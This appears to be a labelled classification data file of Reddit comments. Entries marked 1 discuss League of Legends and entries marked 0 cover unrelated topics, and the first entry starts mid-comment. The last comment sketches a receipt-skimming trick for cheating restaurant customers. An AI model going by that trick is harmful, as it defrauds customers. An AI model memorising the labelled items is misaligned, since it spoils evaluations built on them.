completely, no middle ground. However, she is and probably always will be my favorite champion. (flair aside).   Katarina   And the other oddball, Katarina. Other assassin's go for the single target burst route. Not Kat. She goes for the sustained aoe damage route. She's got a (soon-to-be) unique playstyle and relies on a reset to be any good.
1	I think that's it's actually completely fine to build silly things like that if it's in a normal, as long as you do that consistently. This is because of MMR; if this person would be 1500 if he followed standard builds, then perhaps he'd be 1300 using his own ideas. As long as he's consistently doing that and not doing that only when playing with you, it should have the same effect as if your friend just happened to be mechanically bad.   That said, doing that in ranked I think is just a really poor idea because it will really negatively affect your team's morale and probably draw some flame to you for queueing with him. It would also draw down his MMR there, so if he ever wonders why he can't climb the ladder this would be the reason.
1	While it's almost necessary to jungle with your typical TT bruiser comps, eventually there is a  very  efficient way to avoid jungling, which is playing AP+Range AD+Support. Supporters are limited to Taric and Alistar though, so I heard it often gets outbanned on high Elo 3on3 by taking out these two.   While it may sound complete bonkers to most "olol trynda unbeatable on TT" complaining players, it's extremely effective because a bruiser like Tryndamere will never get farmed and the combined burst of such an indeed very bursty combo can get rid of weaker enemies extremely easy (while it doesn't even  rely  on denying farm, it works either way). Eventually it's almost impossible to win against this without bringing a jungler, because the ad-support lane will always be able to deny bruisers from farming and also almost everything else - so better have an unfarmed 1on2 but at least get the additional xp.
1	IMO switch fiddle and morg and at least bump fiddle higher. Morgana is a situational pick but fiddle is by far a better and stronger support, with a fiddle you can fast push turrets you can siege turrets way better, morgana has a snare fiddle has a fear which is point and click and independent of minions and not a line average moving skillshot that hits the first target.   Fiddles ult is a huge zoning factor in teamfights and can be done over a wall, morgana ult is highly dependent on her movement speed and cannot move over terrain leading to no surprise hence less pressure on the opposing team. Morg ult does 650 base dmg to each target(if and only if the tether is not broken at lvl 18 but it does give a stun of 1.5s but again you need to stick to them for 3s within 600 range), Fiddle does 325 damage per second for 5s base at lvl 18 at 800 range. Although morgs ult scales much higher supports do not usually have that much AP, also i did not take into consideration MR because it is highly variable so i used base statistics. So basically imo fiddle is by far a better overall support in the case of damage, objective strategy and lastly one of the most important teamfight or player zoning. Morgana is a better situational pick to all-in champions IF you hit the blackshields but it is extremely hard to blackshield a flash tibbers and the hook of thresh has a lower cooldown then the blackshield because of on hit CDR reduction. Thresh players can get around the blackshield anways by baiting it out with a hook and using that window of time to and flash+flay+box+hook and again all-in you a different way. Morg in teamfights can blackshield one person: leona has aoe stun, annie aoe stun, alistair aoe knockup, thresh aoe slow in the form of flay and box so protecting one person be it ADC or APC is great and all but you havent countered the total cc of the opposing support. . Although fiddle's only hard cc is in the form of a 2 year long fear the incredible damage of his ult and the rng silence leads to less counterplay in teamfights.   This is why morgana is not picked as a support and was never picked ahead of fiddle because it was by far a limited champion and in theory can counter the S class supports but in practice doesn't bring to the "counter" in terms of cc and pressence that the other supports bring.   Taric and nunu are the only supports that i would give morgana an edge over. A majority of supports mentioned above in tier S,A,B,C can counter her ulti in one skill unless you blackshield yourself leaving the opposing team a 3 second window to engage on your backline just basically ignoring you from the teamfight and after that 3 seconds more than likely than not your stun won't hit many people because most champions picked in the meta have high mobility. and also with the mandatory buy of shurelias (i still call it shurelia's) your hard cc in the form of the second tick of your ult again usually won't occur on most people.
0	There's probably some exaggeration but what do you expect will happen when you put the world's fittest athletes together in one place and put them under extreme pressure to perform in probably the most important competitions of their lives?   I read an article online talking about the sexual activity (I didn't save it) but the
1	All of CLG are top level players, none of them is a 'problem'. The issue with HotshotGG's champion pool has to do with their team strat and his playstyle, rather than his skill as a player. The '2 threat' vs '3 threat' debate is a red herring and has nothing to do with why they have been useless in S3.   The reason CLG is losing in S3 is because they have almost no concept of strategy. By the end of S2 various teams and players finally began to understand Summoner's Rift, and slowly began to develop REAL strategy and map concepts. CLG always had certain understandings about split pushing and alternating lane pushing, and while this is the equivalent to kindergarten level map understanding, it was still greater than the zero understanding every other team in S1 and S2 had. Now that Asian teams, as well as Gambit and Fnatic and a few others, have developed some global tactics and awareness of how to distribute team resources around the map in a fluid and dedicated fashion, CLG's one minor area of map concepts has become obsolete and immature compared to the far more sophisticated understanding other teams have.   CLG has no theorist worth anything on hand, and no one to teach them how to advance in strategic planning and understanding. It is no longer good enough in LOL to be a great player and to know how to put together a team comp; the teams now must have advanced level game plans in order to compete seriously. "Farm well and try to get kills from ganks" is a totally insufficient plan; it is the equivalent of "do well", which is nonsense. Small stuff like 2v1 lane swaps and early tower kills in the 2v1 lane is very basic stuff and only lasts 4-6 minutes. After that these teams don't know what to do, unlike Asian teams and some EU teams that know exactly what to do in every part of the game. NA's biggest problem across the board is that teams don't have tactical instructors explaining to them how to play the map. CLG is probably more stubborn than most teams in altering the way they've played for years, but they are not the only team suffering from this.
1	Any snare or stun leaves you at your current position - your team can respond to that. Skarner's ult drags you away to wherever he wants to take you until the suppression ends. By allowing you to flash/dash away from it, it does nerf Skarner quite a bit but, it only fixes a 'bug' that's been making his ult a bit too strong.   When you look at Blitz hook for example - you know where you are going if you get grabbed and he can't change your position after the hook, and you can flash/dash out of it. It is kinda of unfair that Skarner can displace you and suppress you and you have no way to avoid it outside of being faster than him or flashing way too early, in which case he can just dot it on someone else.   I dunno, I dislike Skarner because his movespeed increase combined with his slow and red buff is just absolutely silly, and his shield just lasts too long compared to the movespeed buff he gets. Luckily it's getting nerfed.   I get where you're coming from though - why should players get a 'panic button' as you put it after they messed up? The thing is that you can't do ANYthing against that Skarner ult - you can dodge Leona's Zenith Blade, you can dodge Bliz's Rocket Grab, you can dodge Malph's ult. The only other initiate/root/stun/etc. that should work like that is Maokai's W, and that's a debate for another time.
0	If you don't have the mental fortitude to work at Walmart then there is a whole host of other jobs you certainly wont be able to do as well. Worked retail, the shit isn't hard, you just have to accept that there are an infinite number of terrible people out there and the company itself will probably treat you like an overpaid slave.
0	Hnnnnnng! Its like heaven's descending upon my feet with every eyelet of my boot laces undone. And if that wasnt good enough the sweet sweet orgasmic tingle of the thick wet carrhart socks being removed from my pruned feet. And as if this angelic orgasm wasnt good enough, putting the dry, clean,warm socks on after is like sleeping with Jennifer aniston followed by her handing you her credit card.
0	My daughter loves Monster High and I actually prefer them over Bratz or Barbie for somewhat specific reasons. I feel like the outcome of both the barbie and bratz universe is basically that everything always works out in the end, start a band? now you have a record deal, start a fashion line? it's top selling, want to be a princess? well turns out you were one all alone. Monster High actually revolves more around friends helping each other out and how by working together you overcome things. It actually deals with social issues but with a monster twist like when they segregated the vampires and werewolves, or dealt with long standing prejudice with humans....As you can tell I watch a lot of Monster High as like I said my 6 year old daughter loves the movies and of all the animated "girl centered" animated movies I prefer Monster High the most.
1	I always find it funny that they keep spewing the statistics "toxic players lose xyz more games on average".   Well congratulations, but you want to know why that is? You don't curse and rage at your teammates when you are winning games.   One thing I have learned with statistics classes, is that you can use the data to say anything you want if you focus on only one piece of the puzzle.   So Riot trying to say that the secret to winning games is not being toxic is incorrect. I appreciate that they are trying to pull one over on naive people, and at least encouraging people to stop being toxic.
1	AD Champions and AP Champions are different. Your question is like asking, what's the better orange, the apple or the pear?   AP Champions focus on bringing burst damage and utility to the team. They provide the brunt of the damage to shift the team fight in favour of your team. For example, Morgana can be used to snare targets for your team and be used to break up the enemy team while providing CC and damage for your team.   AD Champions focus on bringing sustained damage and escape to your team. They provide the continuous damage required to kill tanky champions late game. For Example, Kogmaw and Vayne are two of the best AD carries late game because they do more damage with items than any other champion in the game letting them shred champions with the same amount of money in defence.   albeit, in your level right clicking and going to get a drink is probably easier than trying to balance mana with skill shots while kiting the enemy. Regardless, as you progress through your levels you will eventually see this defining aspect.
0	I don't like the fact that this somehow permits people to abuse me   It doesn't permit people to abuse you. Did you read my whole comment, or just look for a part you could whine about?   Everyone, regardless of their job, ought to be treated with basic respect. I was disrespected many times as a service worker (gas stations, food service, telephones--taking orders for a delivery business, not telemarketing). I have also been disrespected many times while being served. The two are not related beyond the simple overarching fact that many people are just assholes.
1	You know  exactly  what you're doing though. You're not the victim of some crime, you know when you queue up there's a chance of trolls, and you know that you always dodge them and are familiar with the penalties.   As I've said in each of the three posts about this, champ select trolls make up such a small amount of games that queue dodging  is a realistic way to combat them . If you get a troll in champ select when you are 1-1 on promos  this makes up such a vanishingly small portion of the game that it is not worth affecting every single champ select to solve it . Sometimes your luck just sucks, shit happens in life same as in league. That promo will be one of hundreds of games you will play, it makes up a tiny portion of your games.   Do you really not see that adding in a vote to kick system would be far more abuseable and probably cause vastly more problems,  because it is present in 100% of champion selects  than it solves. You're talking about changing the dynamics of 100% of games to solve a problem that probably happens in less than 5% of games overall.   The only thing the system needs, is an option to report in champion select, or for champion select to be included in the report system.   You will  never ever  create a system that is perfect, and it does suck, but even if u solved this problam, there was probably an equal chance that you loaded into your promos 1-1 and someone DCed. That's what kind of chance you're talking about.
1	There's a huge misconception within the league community that the game is flooded with bots. Most of the higher end 'black market' sellers create custom games and have 10 bots play each other. It's REALLY rare (or its a shitty seller) that you get a bot in your game. I know some of you might have, but it's like literally 1% of the actual bots. I know this because I've bought 2 Unranked lvl 30's. I'll look at the match history and it's all custom 10 bots playing each other. This is a better alternative than me stomping new players in the low levels, as well as the fact that I simply don't want to play 300+ games to get to level 30.
1	Decent video overall, but anyone bothered by how many mistakes they made? I can chalk them mistaking the lulu buff numbers( my god quas was off by a lot lol)   But, its pretty obvious they barely read the patch notes when lemon says Alistar will be good with new censor, and doesnt even mention Karma using it with her new shield he just talked about a few minutes ago   Good addition to the
1	I think the use of kill stealing is just used incorrectly. I think thst securing the kill is more important than anything. I have been a sucker for being good guy support/jungler, trying to let my laner last hit the kill and they get away. A lot of this anger has to do witb egoism where every individual has the mindset that the gold is.always better on them because they are the only competent player. The only important thing to is assess how valuable the kill is to an individual. I.E i succesfully counter gank enemy jungler mid and he is about to die with buffs. Do you want that gold to carry or do you want to pass over the enemy double buffs to your laner to give him a HUGE edge mid. other things like trying to give shutdown bonuses to carries is nice too.   In my eyes, a kill steal would be something like you blatantly crushing the enemy in a 1v1 and you put the ignite on the enemy and someone just randomly comes to last hit the champion beefore the ignite kills him. The context that most kids use it is that they want the gold to carry so they throw a tantrum in chat.
1	Australian youths are just a naturally offensive people, we call our friends "cunts" and when you're offended we have the most logical reaction.   We don't give a single fuck, if you're offended how does that affect me? That's the general thought process when an Australian is accused of being offensive. When they say something in all chat they are trying to illicit the (perhaps more toxic) "reported" response. People do worse things as they get more and more toxic, and a deeply ingrained cultural arrogance presents itself more and more.   To me American youths are different in gaming, like 10 years ago anyone in middle school (assuming this is like 5th to 8th grade, no actual clue) would have to deal with, being branded a nerd, the relatively low place on the intense social hierarchy and constant bullying and ostracisation.   From what I can gather, it could be considered to be close to India's old Caste system.   Australians do not have this, sure there is bullying, as there is in all walks of life, but sports aren't considered the be all and end all of Australian schools, we don't have a regimental football season for schools or as much of that school pride bullshit nonsense.   I don't know where I am, with this right now, oh right. Americans are different because it's a wildly different culture. And the gaming side of that can also be expressed (although not particularly linked to league) in how much money we pay for games compared to you! Even now we pay shit tonnes more for the same crap you get. When the American dollar dropped to a fucking terrible amount I was still paying like 24 dollars for a month of wow on subscription.   I felt, hey I'm paying a fuckton of money for this shit, I'll do whatever the fuck I please with it (I didn't do anything that extreme, I just blew up at anyone who tried to talk to me for a laugh). That could also be linked, how the fuck would I know I'm 18 and writing a fucking terribly planned, semi retarded essay on reddit for someone who probably won't read it.   I'm actually dreading like fuck the Australian servers, I'm only gonna move a smurf over to there because, honestly, people here suck. And it breaks a tiny part of me every time I try to play with Aussies I don't know. I would like to see a table showing the most banned players and their position because I have a funny feeling about how it'd read out.
1	9: Current ban limit is too low   I agree that this is a problem, but I would be really surprised if the ban number changes while their policy for releasing champions every two weeks remains the same. (And the PAX Q&A indicates that it will stay the same for the foreseeable future)   The problem with increasing the ban limit is that, right now, at three bans, the common wisdom for ranked is that you need to be willing to play at least three roles (all five, really, because not all teams are willing to communicate) and that you should really have at least three champions for each role because of the opponents' bans and picks.   If the ban number goes up, a team could very easily just ban every top X in the current meta. You can then get into a discussion on team comp strategy, shigting meta, etc, but the one thing you can't really avoid is that more bans means that you need more champions to stay effective; if you keep the ban number proportional to the total number of champions, the game becomes very unfriendly to new players and casuals very quickly. From a business, game design, and customer loyalty perspective, this is not something that Riot is going to be willing to do.   >.
1	Using the specific example of creating and playing custom games, imagine if it was actually easy to launch a custom game quickly(!), imagine if you could create and test masteries/runes out WITHIN that custom game, if you could create your champion-specific “buy” menus in that game by clicking around the actual shop, if you had skill/score challenges and simple training categories you could activate whilst in there, imagine having your friends able to join it and play with you, and… imagine doing this whilst you are queuing for a matchmade game.   I have been thinking about this a lot and a couple of years back I used to play a game called "Battle Forge". In this game you basically have a small lobby in which you could summon your creatures and jerk around with them (video of this   If riot where to implement something similar to this but more advanced, think what OP already mentioned, I reckon the time inbetween games become a lot more enjoyable.
1	I personally don't think the rune combiner is all that bad. Think of it as a sort of gambling mechanism. If you purchase 25 tier one runes at the cheapest price (15 IP) you'll spend 375 IP. The average tier 3 rune is worth 410 IP and that's not taking into account quintessences. Now it is true that the odds of getting something you actually want is slim, and you can have more than 9 of any mark, glyph, or seal via the combiner making them even more useless; however, you can get lucky and I think the rune combiner serves a purpose that way.   All this said, your first upgrading suggestion is great. It's simple and easy and there's not much of a reason that it couldn't be done as far as I can see.
1	So if you want to know why Dyrus is more popular than SC2 and Dota 2 streamers, that is a really easy answer.  LoL is simply a more popular game.  As good as those other games are (I enjoy SC2 and though I am not in the DotA 2 beta I've heard good things) their numbers are just small potatoes in comparison to the behemoth that is the player base and fan base of League.  For the people that don't play DotA 2 or SC2 it's really silly to tell them to tune into a stream for that game. Just because you play all three doesn't mean everyone does.   So that was the easy part, I think your question is trying to probe a little deeper though. I think what you really want to ask is "Why is League more popular than SC2 and DotA 2?" I've heard this question from a lot of people who prefer HoN or DotA whose argument seems to be based on the idea that those games are 'superior' in some way and the players more skilled.  This isn't really the place to get into a LoL vs DotA argument and I don't think that was the point of your post so I'll just skip over it and give the real answer (in my opinion).  The way I see it, the popularity of LoL has way more to do with their business model than with the content of the game.  I think Riot made some really savvy choices when they decided how to make and market League and it really paid off for them.  Now this all may change when DotA 2 officially launches but that is the way things are right now.   While DotA and LoL are similar games and may have some overlap in skills required they just aren't the same game.  The biggest barrier to entering any MOBA type game is the sheer knowledge about champions and items that you need to acquire.  For someone who plays League but not DotA, watching a DotA stream will be really confusing. You may be able to appreciate Sing_Sing's last hitting skills but if you don't know what his champion does, what his allies do, what his opponents do, what any of the items do then you're going to be totally lost.  It's hard to appreciate someone's great timing or positioning on their ultimate if you aren't aware of what it even does.   To end, I'll address your nitpick. The mini map on the right is just the default setting on League of Legends. Some people who transitioned from other games were bothered enough to switch it in the game options but most people either don't care or didn't know any better since they have never played DotA or SC. The only reason you prefer mini map on the left is because that is what you are used to and that is the same reason why LoL pros might be resistant to switching.
0	As far as I see it, it's a very complicated situation for both sides. As it stands I believe Putin realizes to invade the rest of Ukraine (the non-Crimean/majority ethnic Russian) population would cause more harm to Russia than good. As far as I know, Crimea used to belong to Russia pre-Soviet times and then after the fall it was allocated to be part of Ukraine, which is why it has a Russian ethnic majority. Russia really needs the Crimean port which it has right now, and it also wants Ukraine to be Pro-Russia. As it stands the main problem is that Ukraine relied on Russia for a lot of monetary support, and the United States nor the EU has enough extra money to support Ukraine to the extent that Russia has, e.g with its natural resources especially the natural gas pipe lines going to Ukraine from Russia. Because of this Ukraine would be more economically inclined to side with Russia, however they clearly want independence and to be with the European Union. Another issue is if they go the EU way that they would most likely lose a large portion of Eastern Ukraine due to the massive Russian population as well as Crimea.   If Putin was to invade the rest of Ukraine, it could possibly lead to internal conflict between its Russian and Ukrainian population, if it escalates this will cause massive problems for decades, not to mention that there is also a huge Ukrainian population in Russia. So hatred between the two nationalities would be a massive issue for Russia and is definitely not beneficial to them. This is the reason I believe Putin has not pushed his troops into the non-Russian majority portion of Ukraine as well as why there has been no actual fighting as of yet.   Because the Untied States cannot economically support Ukraine, we are left with very limited options. Clearly we must assist Ukraine in some way, as I also believe that it is very important to maintain contracts/our word, otherwise we lose a massive amount of credibility and therefore political influence amongst other nations.   I'm going to throw out direct military intervention immediately, to even think of this as a solution is insanity. We have prevented WWIII since the beginning of the Cold War because we have never had actual direct military confrontation with the Russians, I believe that both sides know this with the fact that the world is still here as evidence.   Moving troops into Ukraine (not Crimea/Eastern Ukraine) and creating a 'border' between the majority Russian and the majority Ukrainian portions of the nation is a somewhat realistic possibility, the problem is we would probably receive a lot of negative press and considerable anger from many nations most definitely those which are pro-Russian. Also much of the population of Ukraine would also not enjoy American troops in their land possibly even less so than having Russians.   We could also possibly escalate the situation, by giving indirect military support e.g weapons and such, but that would do little to stop the Russians from conquering the nation. All it would do is possibly cause the prior mentioned internal conflict. It would be absolutely disastrous for Ukraine and Russia if our indirect support were to spark infighting amongst the ethnic populations as I mentioned before. This would definitely harm Russia, and is beneficial to the United States, however it would absolutely tear apart Ukraine and cause countless casualties for years.   From the cards that can been seen right now, all we can really do right now is economically and politically sanction Russia (which doesn't have much effect to a superpower), otherwise the only other thing we could do is escalate the situation and cause a disaster whether it destroy Ukraine and harm Russia... or destroy the entire world in event of direct war (very unlikely).   So this is why nothing has really happened in the last few days, because Russia pushing forward into the rest of Ukraine would be a disaster for Russia, and withdrawing from Crimea and the Eastern Regions and allowing the whole nation to fall into the hands of the EU would also be bad economically for both nations.   The United States cannot really solve the situation unless we find a magical way to economically support Ukraine...or as I said before sacrifice the well being of Ukraine in order to harm Russia. Some may think that the latter would not happen, but those that know their history know well that we the United States are no strangers to toppling nations if it is to our benefit.   In my opinion, the way the situation is going right now the most likely outcome would be for Crimea/part of Eastern Ukraine to declare independence/and or become part of Russia, and the rest of Ukraine to gain its independence and most likely join the EU. The EU portion of Ukraine would suffer massive economic damage due to the loss of aid from Russia, and the EU would suffer economic damage from having to support Ukraine, so before they would even become part of the EU if they gain their independence, they (Ukraine) will suffer massive economic damage.   Until something new develops all we can merely do as the United States is continue sanctioning Russia politically and economically with little effect, or escalate the situation.   Although I am American I honestly believe in order to prevent the most amount of damage to Ukraine as possible it would be most beneficial to allow for Russia to make an economic deal with Ukraine's new government and to keep them Pro-Russia. Unless we can find a way to conjure up money to give to Ukraine.   However, this is obviously detrimental to the United States in terms of influence. It's a horrible situation regardless of the outcome.
1	He's really fun as a support, and unfortunately I played him often when I was better with other champs. I stopped playing him though, in favor of Janna. I'll add him into my rotation of comfortable support champs when I feel I contribute positively to my team.
1	I'm not sure how many people will actually see this, but if at least one person reads it and takes it into consideration then that's enough for me.   You get quite a thick skin playing league, I mean being told to get aids because you don't play well is hardly pleasant, but you get over that because you realise how ridiculous the whole situation is. But reading through the comments on this thread have made me feel far worse. Being told with such conviction that I'm the follower of a brutal masogynistic religion is tough to swallow.   Let me start off by saying, I completely disagree with the way in which Iran has dealt with this, and I believe that the majority of Muslims would also disagree with this. Iran is not representative of all Muslims, heck having traveled to Iran on holiday, there government and laws are not representative of its own people. The majority of people secretly curse the supreme ayatollah khomenei and his rule in private, but they're too fearful to do so in public. Even though Iran is a brutal country as far as governance goes, females aren't forced to stay in there homes etc, from what I saw the majority of women worked, I met many different women, from doctors to engineers.   Clearly the Iranians have not read the same Quran that I have, the Quran that states that men and women are equal and that men and women are supposed to stand side by side, not one being higher or lower than the other.   I mean, when people come out with these crazy comments about Islam being an extreme and violent religion, do they really believe that 1.6 billion Muslims, a quarter of your fellow men women and children in the world are followers of a warlike and brutal religion? I mean let's think of the big muslim names out there.   Mohammed Ali, Cat Stevens, Malcolm X, Mike Tyson, Jermaine Jackson, Lupe Fiasco, Kareem Abdul-Jabbar, Akon and heck even that one kid from one direction, Zayn Malik, sure he may produce crap music but he's hardly a brutal misogynistic kind of guy.   I really think the league community is smarter than this, do you tar everyone with the same brush? It's extremely stupid, it's like blaming every European for the holocaust, or every Christian for the crusades and the anti Jewish pogroms, or every Atheist for the atrocities committed by Stalin and Mussolini,  or saying that every European league player plays anivia like froggen because "heck they're all the same" Are you getting my drift yet? Not every european, every christian, every atheist or heck every league player is the same, so why is it that every muslim is the same extremist sort?
1	I think people watch streams for two reasons:  Learning and Entertainment . On average I think it's at least 2/3 about entertainment and only 1/3 about learning.   The learners are basically satisfied by people explaining everything in detail, by showing off their runes, telling why they max which skill, why this item or that, what went wrong in that teamfight, and so on and so forth. So basically just explain the game to the viewers.   Now fulfilling the entertainment is a little harder, as not all people are the same. I think it's best to have something of everything. A bit of raging and trashtalking with exaggeration (think of OddOne), a bit of stating funny things, laughing (Dyrus does that a lot), even telling people of your life. Of course it's also about doing great plays, but basically every top-player-streamer does that.   For your stream in specific... I think first of all you need to talk more. No matter about what, in fact. It can be the Scarra-like teacher-style, it can be the OddOneish "Viktor-you-useless-piece-of-shit-style", it can be "oh-my-god-lol-style" from Dyrus, it can be like super-raging, no matter what. Just talk. And I'd advise you to address the viewers with your talks. But you know that.   As there aren't many support-players streaming, but there surely are some people interested in learning, it would be cool if you could just stream support-games and explain in detail what you do. Like itembuild, runes, masteries, poking in lane, cv-ing here and there, warding, ... and always explain why.   Another thing you really lack is music. If you don't talk it's just... silence. If you don't hear like Dyrus in the background (so why not be entertained by Dyrus-stream then, right?).. If say OddOne or Dyrus doesn't talk for a minute, there is still music, the game-sounds are loud enough. This is actually a lot less boring than... silence. ;-)   Now last talk about your life. There is TSM-house. Even if guys aren't TSM-fans it is fun to hear all the shit going on there. Just mention some anecdotes from time to time. And you have a girlfriend who is probably known to stream-watchers as well, so why not talk about her pregnancy or whatever. Again, it's about entertaining people.   I don't think it's neccessarily about the role you play, though people seem to prefer watching top-laners (which I personally cannot understand) and junglers.
1	I might be wrong, but I don't think it's such a huge issue. Equal 'rights' are cool and all, but Riot doesn't have to work on a pretty non-existent problem. Judging by the comments, there are not many colorblind people around here who find this issue annoying (me being one of them).
0	Yes,  Here in the USA there are industries that are there specifically to rape the consumer.   Some of the many industries include: healthcare, insurance, car dealerships and education.   These industries are protected by the government because of lobbyists.
1	Inc rant:   It's  because  you get pissed off that people keep saying 'ez'.  What's the best counter to this? Just stop caring. What's the point about getting riled up or even getting annoyed by something so irrelevant? That's exactly what those people want. If it's constant abuse and out of line, (e.g. Go kill yourself, worst w/e NA, blah blah) then sure by all means go ahead and report/mute/complain/whatever. But if you're going to "report" for a little 'shove-it-in-your-face comment because you're overly sensitive, then just perma-mute everyone. It's a video-game. An online video-game. This isn't a playground at a sunday school church. What do you expect? Toxicity, even to the smallest degree (like someone saying 'ez'), is embedded into any video-game culture, and reporting anyone who conveys just a smidge of it is frankly counter productive. Save the reports for the out of the line cases. That's the most effective way to make reports valuable.  Bring the down votes, because 'ya know, I have a different opinion.
0	Story:   I moved into town and found out quickly that I had been used as a ride, and was quickly pushed out of the place we all shared. Ex-roommate gave me room on his couch until I could find a job. After a few months, he, another friend and I get a 3-bedroom location, and I get a great paying job shortly after. I pay everyone back quickly and am able to pay my bills without complications.   Other roommate moves out, and Steve here decides he wants the bigger bedroom now unoccupied, even though it will cost more. But only moves his furniture into the new room and leaves a mess of trash and trinkets in his old bedroom, so no one can come in to see the place so we can get another third roommate.   Now that our bills are higher because it's 2 people, not 3, paying the bills, he has trouble paying his full share. Then he loses a job, and has less money to pay his share, but not go out to bars and events with his friends. Gets another job, and loses that one soon after. Has to keep borrowing money from me to pay for gas and food, and I have to cover more of the bills.   In one of the last months there, Steve said that he has the money to pay the rent and his share of the bills several times when asked before the end of the month. On the 1st, he has no money to pay any of the bills at all. When asked why he would say he has the money when he didn't, Steve says that he thought he would have had a bigger paycheck.   I find out through his social media that the following weekend, he decided to go out barhopping with his friends while I had to stay home, nearly broke from covering all of the bills at the apartment.   When I confront him about how much he owes me, while he's out having fun, I give him a list of the total he needs to pay me, and even ask him to work out a payment schedule. I also tell him he has to get a second job if he has that much trouble getting his bills paid. He whines that he'll have less time to spend with his friends, so having two jobs is out of the question.   When he won't work with me on the bills he owes, I threaten to take him to court. Steve then says that I owe him. He provides math where I suddenly owe the entire rent, utilities, gas and such from when I crashed on his couch, ignoring that he and his other roommate occupied both of the bedrooms in the place, and that when I had money I bought food, gave some to utilities and such.
0	Hehe... Not really. I just remember one time being a DD and a girl was a bit rude to me because I didn´t want to overload the car, but that´s about it. I have however experienced a lot of different cultures when it comes to drinking. New York and London where everybody just uses public transportation or taxis. L.A. where everybody drives after drinking, and it´s socially accepted as long as you are not wasted. Norway where it´s not tolerated to drink a single beer and get behind the wheel, but it´s perfectly fine to drink 24 beers and walk in the middle of the street. Or Thailand where even I was driving scooters without a helmet, so drunk I could hardly see the road. Main point is that it´s a very unnecessary way to die, get hurt or hurt others. I know my mother would tolerate it if I die in an avalanche while snowboarding or if I drowned while kiteboarding, but I don´t have to take away any of the fun part of drinking and can still be safe.   Anyways. I´ve been drunk many times and most of those times I´m not the best person person to hang around if you are sober. I once ended up with a group of people in L.A. and it wasn´t before the next morning that I realized that I didn´t really thank the driver enough. He wanted to drink, but sacrificed his fun to keep his friends safe. That´s noble and he should be give as many medals as a soldier get for keeping his country safe. If you look at number of people killed by terrorists, American soldiers killed in war and compare it with people killed by drunk driving you will realize why I so passionate about this. (My source says it´s more than 10,000 in the US alone, but Google it yourself).   Over to my last point. This is the one that I have most experience with and it is the drunk friend/sober friend situation. The sober/sober combination is the worst. You don´t really belong in a bar in the first place. And only creepy "the game" players would ever go for this option. The drunk/drunk combination is the most fun, but you are hardly ever getting laid and getting somebodies number often becomes secondary to being jackasses and just broing out. The sober/drunk combination (or the designated driver/drunk bro combo) is a bit hard to master, but can be more effective than the classic good cop bad cop combo. In a perfect world the drunk guy smashes the ice and introduces the sober guy to some girls, then almost immediately moves on to somewhere else. Sober guy excuses his "rude" friend and the girls now have the option between the cocky douche or the polite gentleman. But, not only that, the sober guy can say: "He is really not this forward when he´s not drinking and he´s a really nice guy" and he can also say: "I´m more fun when I´m drinking myself, I hope the next time I will be drinking and my friend will be driving". Drunk guy should be picking up complimentary non-alcoholic drinks for the sober guy ever so often. Anyways, this wasn´t really meant as pick-up tricks, it´s more of a way to make the experience for the designated driver less painful.
0	Story time!  So I definitely feel your pain, OP. one of the first times I smoked tree, I was at a friends and it was around 9:30 at night. Deciding I couldn't stay any later, I decided to walk home, but about halfway back, I realized I'd forgot to piss at my friends and had to go pretty bad. No biggie, the streets were lined with woods, so I just ducked off to the side, whipped it out real quick, and pissed. I immediately zipped back up, couldn't have taken longer than twenty seconds. So I continue my journey homeward, and upon arriving home I have to pee again (those Big Gulps will really do you in.) so I head to the bathroom after saying hello to my dad and roommate, still relatively high, and whip it out once more. This is when I notice a strange black dot on the head of my dick. I rationalize it as lint, and attempt to brush it off, but when I do, it causes some serious pain. That's when I realized the 'lint' is actually a huge fucking tick. I panic, scream for my dad, and tell the story to him and my roommate as they laugh themselves to tears. My dads solution? To heat a needle and burn the ticks head to get it to let go, and pluck it off with tweezers. After twenty minutes of repeatedly missing the ticks head and burning my dick, I proceed to let out a mighty war cry and rip the tick from my dick. I come out of the bathroom to find my dad and roommate standing just outside the bathroom, still laughing from my howls of pain. My penis had burn marks all over it. I was known as "tickdick" around the house for three months straight and dear old dad told the story to any of my friends who would listen. Namely, all of them. They still call me tickdick now and again, just to humiliate me.
0	as someone who has experiences depression, anxiety, social awkwardness, and recently of a few years extreme paranoia, I have always had the option to take drugs. i avoided it with all my strength and have never taken a pill for anything, however living with these various things and taking nothing for it is a bittersweet reality on the one hand i don't do great in school, have very little friends who i believe don't like being around me, have been bullied my entire life for always being like this, and have wanted to kill my self a few times. on the other hand i have had 2 other friends (i use that term loosely) who where fairly calm but who failed a bunch of classes because they just couldn't keep themselves down, they got hooked on these anti-blank drugs did great but once they could no longer afford it one lived a enriching life of going nuts and killing himself the other robbed a convenient store and is now facing 5 years in prison. in the end at least i didn't end up like them
1	Sounds good, I usually end up playing support anyway because at 1k nobody wants to play support.   So I figure its better that I play it rather than some troll who decides to go twitch support or something silly, I just don't consider myself as comfortable as I do in the other roles.   I think maybe if I learn't a few aggressive supports like blitz/ali/lenoa then I'd be more comfortable in my abilities knowing that I could setup kills as well as protect my carry, but right now I'm only happy/'not a feeder noob' playing janna/soraka.
0	I'm going to paste a story I've said elsewhere on Reddit, below is my;   Experience with the Australian Healthcare system .     I had a Lipoma (benign tumor) removed from my back 2 months ago, I had a few doctors visits before that and a surgery consultation to get on the waiting list (as it's a non-emergency procedure). The waiting list was a about 6 months, went in to the day hospital for about 6-7 hours, procedure done, I was told to remove the bandage on my back after a week.   About a week later I removed said bandage, turns out the wound was still open and it got infected, after a few days of infection doing it's thing (silly me didn't go to doctors straight away) it got pretty bad, went to the doctors, he told me to go the emergency department. So my mum took me to the emergency department, the infection was too big for local anesthetic so they had to put me through for a general surgery, which means no food/drink 12 hours before.   So I spend the night there, have the surgery, stay in hospital for another day or two for recovery. It was 2 nights and 3 days total. Anyway, I had a nurse come to my home every day for a week afterwards to do the dressing change, then after that I've been going into the doctors to get the nurse there to change the dressing every day.   I stopped going about a week ago as it's finally recovered, but you want to know how much everything cost me? Well I spent about $50 on medical supplies, that's it.   God bless Australia.
0	Well the first receipt would come in at $100 and he/she would bring it over to cash it in. Most people leave money and get up so I assume this person would only do this if he/she has seen the person(s) leave knowing they don't want a final receipt. It's very possible OP is just sloppy and does it without looking and will likely get caught.   It's also possible someone will come back in and ask for a second receipt but I'm sure you could say "you left without getting your change I gave you %10 off" or something.
